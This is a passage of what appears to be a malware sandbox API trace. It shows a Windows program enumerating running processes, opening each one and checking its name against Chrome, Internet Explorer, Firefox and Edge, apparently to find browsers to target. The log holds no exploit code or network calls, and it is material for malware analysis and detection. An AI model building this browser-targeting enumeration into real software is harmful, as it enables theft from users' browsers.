	[0201.921] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0201.921] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x20c0
	[0201.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.921] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0201.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.922] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.922] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0201.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.922] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.923] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0201.923] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x20c4
	[0201.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.923] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0201.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.924] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.924] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0201.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.924] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.924] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0201.925] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x20c8
	[0201.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.925] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0201.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.925] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.926] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0201.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.926] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.926] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0201.927] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x20cc
	[0201.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.927] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0201.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.928] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.928] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0201.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.928] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.928] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0201.929] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x20d0
	[0201.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.929] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0201.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.930] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.930] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0201.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.930] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.930] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0201.931] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x20d4
	[0201.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.931] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0201.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.931] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.932] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0201.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.932] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.932] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.933] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x20d8
	[0201.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.933] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.933] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.933] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.934] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.934] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.934] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x20dc
	[0201.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.935] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.935] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.935] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.936] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.936] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.936] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x20e0
	[0201.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.937] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.937] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.937] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.938] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.938] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.938] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x20e4
	[0201.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.939] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.939] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.939] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.939] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.940] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.940] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x20e8
	[0201.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.940] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.941] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.941] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.941] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.942] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.942] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x20ec
	[0201.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.942] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.943] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.943] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.943] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.944] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.944] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x20f0
	[0201.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.944] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.945] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.945] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.945] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.946] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0201.946] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x20f4
	[0201.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.946] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0201.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.947] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.947] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0201.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.947] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.947] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.948] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x20f8
	[0201.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.948] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.949] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.949] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.949] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.949] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0201.950] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x20fc
	[0201.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.950] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.950] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.951] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.951] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.951] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0201.952] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x2100
	[0201.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.952] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0201.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.952] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.953] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0201.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.953] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.953] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.954] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x2104
	[0201.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.954] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.954] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.955] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.955] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.955] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0201.956] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x2108
	[0201.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.956] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0201.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.956] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.956] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0201.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.957] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.957] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0201.958] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x210c
	[0201.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.958] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0201.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.974] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.975] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0201.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.975] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.975] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0201.976] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x2110
	[0201.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.976] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0201.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.976] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.976] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0201.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.977] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.977] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0201.978] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x2114
	[0201.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.980] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0201.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.980] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.980] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0201.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.981] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.981] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0201.982] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0201.982] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0201.982] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x2118
	[0201.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.983] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0201.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.983] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.984] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0201.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.984] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.985] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0201.985] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x211c
	[0201.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.986] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0201.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.986] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.986] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0201.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.987] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.987] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0201.988] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x2120
	[0201.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.988] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0201.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
